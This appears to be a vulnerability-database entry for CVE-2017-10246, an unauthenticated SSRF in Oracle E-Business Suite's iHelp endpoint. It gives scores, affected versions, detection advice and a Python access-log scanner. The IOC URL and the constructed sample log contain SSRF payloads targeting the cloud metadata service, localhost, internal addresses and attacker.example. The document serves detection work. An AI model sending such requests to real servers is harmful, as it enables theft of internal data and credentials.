CVE-2017-10246
published 2017-08-08

CVE-2017-10246: Vulnerability in the Oracle Application Object Library component of Oracle E-Business Suite (subcomponent: iHelp).

Priority: P2 (66)
CVSS 3.0: 8.2 High (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)
Exploit: EPSS 13.94% (96.1st percentile)
Vulnerability in the Oracle Application Object Library component of Oracle E-Business Suite (subcomponent: iHelp). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Application Object Library accessible data as well as unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N).

Affected

10 ranges (the version range and fixed-in values are not shown on the page; the affected releases named in the description are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6)

Vendor              Product                     Ranges
oracle              application_object_library  5
oracle_corporation  application_object_library  5

Detection & IOCs (extracted from sources)

URL:  http://<host>/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://
Path: /OA_HTML/help
  • Detect SSRF attempts via the 'topic' parameter of /OA_HTML/help: look for HTTP/HTTPS URLs or internal IP addresses supplied as the value of the 'topic' query parameter. The parameter is normally a help topic name, so an absolute URL there is anomalous.
  • Monitor outbound HTTP requests originating from the EBS application server to RFC 1918 addresses, link-local addresses (cloud metadata endpoints) or unexpected external hosts; these may indicate SSRF exploitation via the iHelp subcomponent.
  • Alert on unauthenticated GET requests to /OA_HTML/help whose 'topic' value begins with 'http://' or 'https://', especially from external or untrusted source IPs. Check the value after percent-decoding, since an encoded scheme ('https%3A%2F%2F') is the same payload.
  • Affected versions are Oracle E-Business Suite 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6 only; detections should be scoped to these versions.
  • The vulnerability is in the iHelp subcomponent of Oracle Application Object Library; WAF/IDS rules should target the /OA_HTML/help endpoint specifically.
  • The vendor patch was released on 18 July 2017 (Oracle Critical Patch Update, July 2017); patched systems should no longer be vulnerable, so these detections are most relevant for unpatched deployments.
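The inbound side of the detection logic in the bullets above, written out in Python and run over a few constructed access-log lines. This is an added example, not code from the source page, from Oracle or from any vendor rule set. The combined-log format, the sample addresses, the "internal" ranges (RFC 1918, loopback, link-local) and the hostname list are assumptions. It goes slightly beyond the bullets: it percent-decodes the query so an encoded scheme is caught, flags protocol-relative values (`//host/`) as well as `http://`/`https://`, and, because access logs carry no session state, approximates "unauthenticated from an untrusted source" by whether the client address is inside the trusted ranges.

```python
"""Flag SSRF attempts against the Oracle EBS iHelp endpoint (/OA_HTML/help) in access logs."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

HELP_PATH = "/oa_html/help"

# Combined-log request line: source address, bracketed timestamp, quoted request, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)  # http://, https://, gopher://, ...
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Assumed "inside" ranges: RFC 1918, loopback and link-local (covers cloud metadata at 169.254.169.254).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]
# Hypothetical list of names that only make sense from inside the estate.
INTERNAL_HOSTNAMES = {"localhost", "metadata.google.internal"}

# Constructed sample log (not from any real system).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Aug/2017:10:01:02 +0000] "GET /OA_HTML/help?locale=en_US&group=per:br_prod_HR:US&topic=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 512
10.20.30.40 - - [08/Aug/2017:10:01:05 +0000] "GET /OA_HTML/help?locale=en_US&group=per:br_prod_HR:US&topic=PER_ENTER_PERSON HTTP/1.1" 200 10240
198.51.100.9 - - [08/Aug/2017:10:02:11 +0000] "GET /OA_HTML/help?topic=https%3A%2F%2Fattacker.example%2Fcollect HTTP/1.1" 302 0
198.51.100.9 - - [08/Aug/2017:10:02:12 +0000] "GET /OA_HTML/help?topic=//192.168.1.10:8080/ HTTP/1.1" 200 0
10.20.30.40 - - [08/Aug/2017:10:03:40 +0000] "GET /OA_HTML/help?topic=http://localhost:7001/console HTTP/1.1" 200 0
192.0.2.5 - - [08/Aug/2017:10:04:00 +0000] "GET /OA_HTML/RF.jsp?function_id=1 HTTP/1.1" 200 2048
"""


def is_internal_ip(text):
    """True if text parses as an address inside one of INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def classify_topic(topic):
    """Return the reasons a topic value looks like an SSRF payload (empty list if benign)."""
    reasons = []
    if SCHEME_RE.match(topic):
        reasons.append("absolute URL in topic")
    elif topic.startswith("//"):
        reasons.append("protocol-relative URL in topic")
    lowered = topic.lower()
    if any(name in lowered for name in INTERNAL_HOSTNAMES):
        reasons.append("internal hostname in topic")
    for literal in IPV4_RE.findall(topic):
        if is_internal_ip(literal):
            reasons.append(f"internal address {literal} in topic")
    return reasons


def scan_line(line):
    """Return findings for one log line; [] if it is not a suspicious /OA_HTML/help request."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if parts.path.lower() != HELP_PATH:
        return []
    # parse_qs percent-decodes, so topic=https%3A%2F%2F... is seen as https://...
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for topic in query.get("topic", []):
        reasons = classify_topic(topic)
        if reasons:
            findings.append({
                "src": m.group("src"),
                "status": int(m.group("status")),
                "topic": topic,
                "reasons": reasons,
                # Logs carry no session state, so "untrusted" is judged by source address.
                "severity": "medium" if is_internal_ip(m.group("src")) else "high",
            })
    return findings


def scan_log(text):
    """Scan a whole access log and return all findings in file order."""
    return [f for line in text.splitlines() for f in scan_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["src"], f["topic"], "; ".join(f["reasons"]))
```

Run against the sample it reports four hits: the metadata-endpoint probe and the two from 198.51.100.9 as high, and the `localhost` probe from 10.20.30.40 as medium because the client is inside the trusted ranges. The legitimate `PER_ENTER_PERSON` help lookup and the request to a different `/OA_HTML/` page are ignored. A response status of 302 or a tiny body on a flagged request is worth correlating with the outbound-traffic monitoring from the second bullet, since that is where confirmation of an actual server-side fetch would come from.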

CVSS provenance

Source  Version  Score  Severity  Vector
NVD     v3.0     8.2    HIGH      CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
NVD     v2.0     6.4    MEDIUM    AV:N/AC:L/Au:N/C:P/I:P/A:N